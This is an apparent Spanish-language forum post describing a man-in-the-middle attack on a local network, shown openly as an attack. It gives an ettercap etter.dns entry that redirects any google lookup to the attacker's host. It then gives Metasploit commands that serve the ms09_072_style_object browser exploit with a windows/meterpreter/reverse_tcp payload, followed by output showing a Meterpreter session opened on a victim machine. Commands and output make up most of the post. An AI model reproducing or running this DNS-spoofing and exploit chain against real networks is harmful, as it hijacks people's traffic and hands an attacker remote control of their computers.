Buenas a todos, me apasiona este mundo de la seguridad informatica y queria compartir con vosotros un metodo que puse en practica hace algun tiempo.

Es bastante simple la verdad, pero siempre me comia la cabeza pensando en como redireccionar las peticiones de un host a donde yo quisiera, pues bien...

Utilizo tecnicas de envenenamiento DNS con ettercap, el fichero de configuracion quedaria de la siguiente manera, dentro del programa hay que habilitar el plug-in de envenenamiento para que esta redireccion tenga exito.

root@linux-on-war:/home/belerofonte# vi /usr/share/ettercap/etter.dns

################################
#
*google* A 192.168.1.20
#
################################

con esto redireccionamos cualquier peticion de navegacion a google redireccionandola a nuestra maquina.

En Metasploit configuraremos un servidor que este a la espera de recibir una conexion y a si vulnerar el fallo.
Al tratarse de trafico web configuraremos el servidor por el puerto 80 y seleccionamos un path para que salte automaticamente sin indicar nada.

Seleccionamos nuestro payload y arrancamos el servidor...

Code:
root@linux-on-war:/home/belerofonte# msfconsole

msf > use exploit/windows/browser/ms09_072_style_object

msf exploit(ms09_072_style_object) > setg SRVHOST 192.168.1.20
SRVHOST => 192.168.1.20

msf exploit(ms09_072_style_object) > setg SRVPORT 80
SRVPORT => 80

msf exploit(ms09_072_style_object) > setg URIPATH /
URIPATH => /

msf exploit(ms09_072_style_object) > set PAYLOAD windows/meterpreter/reverse_tcp 
PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(ms09_072_style_object) > setg LHOST 192.168.1.20
LHOST => 192.168.1.20

msf exploit(ms09_072_style_object) > exploit [*] Exploit running as background job.
El equipo victima navega a google...
Code:
[*] Started reverse handler on port 4444
[*] Using URL: hxxp://192.168.1.20:80/
[*] Server started.
[*] Entering heap spray mode for 192.168.1.21:49844
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.1.20:4444 -> 192.168.1.21:49873)
Espero que os guste, un saludo...

Belerofonte